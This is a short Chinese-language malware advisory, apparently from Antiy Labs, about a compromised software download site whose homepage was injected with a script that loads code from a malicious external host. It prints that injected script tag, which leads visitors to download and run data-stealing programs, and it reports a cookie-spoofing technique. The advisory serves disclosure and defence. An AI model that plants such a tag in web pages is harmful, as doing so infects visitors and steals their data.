近日安天实验室反病毒监测网发现,绿色软件站 (http://www.onegreen.net/index.asp)被黑客植入病毒,利用了Cookies 欺骗漏洞挂马,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序。盗取用户敏感信息。
该网站的主页里被插入如下框架:
代码:
| <script language="JavaScript" src="http://ad.goosms.cn/adv/onegreen.asp ?cid157&a=&b=&c=&d=&e=&f=" type="text/javascript" id="onegreen"></script> |
http://ad.goosms.cn/adv/onegreen.asp?
cid157&a=&b=&c=&d=&e=&f=
得到代码如下:
从代码分析并未分析出可疑的地方,对其抓包分析发现利用了Cookies欺骗漏洞挂马。
抓包结果如图:
从抓包来看出其利用的Cookies 欺骗挂马方式。
